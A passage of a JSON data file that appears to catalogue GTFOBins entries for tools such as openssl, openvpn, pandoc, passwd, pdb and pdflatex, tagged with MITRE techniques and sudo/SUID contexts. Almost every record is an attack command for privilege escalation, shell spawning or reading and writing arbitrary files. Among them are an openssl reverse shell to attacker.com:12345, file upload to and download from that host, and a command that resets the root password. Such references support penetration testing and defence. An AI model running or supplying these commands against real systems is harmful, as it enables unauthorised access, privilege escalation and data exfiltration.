provided that `sqlite3` is installed.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/opencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:download:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:download:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:download:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-read:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-read:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-read:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:1:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:1:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:file-write:1:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:library-load:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:library-load:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:library-load:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:reverse-shell:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:reverse-shell:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:reverse-shell:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:upload:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:upload:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openssl:upload:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:file-read:0:sudo","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:file-read:0:suid","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:file-read:0:unprivileged","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:shell:0:sudo","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -s'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:shell:0:suid","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -p -s'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvpn:shell:0:unprivileged","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -s'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openvpn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:openvt:command:0:sudo","toolId":"gtfo:openvt","toolName":"openvt","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"openvt -- /path/to/command","description":"The command execution is displayed on the virtual console.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opkg:shell:0:sudo","toolId":"gtfo:opkg","toolName":"opkg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm opkg install x_1.0_all.deb","description":"Generate the Debian package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho 'exec /bin/sh' >x.sh\nfpm -n x -s dir -t deb -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-read:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-read:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-read:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-write:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-write:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:file-write:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:inherit:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:inherit:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pandoc:inherit:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:passwd:privilege-escalation:0:sudo","toolId":"gtfo:passwd","toolName":"passwd","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"echo -e 'x\\nx' | passwd","description":"This changes the root password to `x`, so it's now possible to log in using, for example, `su`.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/passwd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:paste:file-read:0:sudo","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/paste/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:paste:file-read:0:suid","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/paste/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:paste:file-read:0:unprivileged","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/paste/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pax:file-read:0:sudo","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pax/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pax:file-read:0:suid","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pax/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pax:file-read:0:unprivileged","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pax/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdb:inherit:0:sudo","toolId":"gtfo:pdb","toolName":"pdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npdb /path/to/temp-file\ncont","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdb:inherit:0:unprivileged","toolId":"gtfo:pdb","toolName":"pdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npdb /path/to/temp-file\ncont","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-read:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-read:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-read:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-write:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local 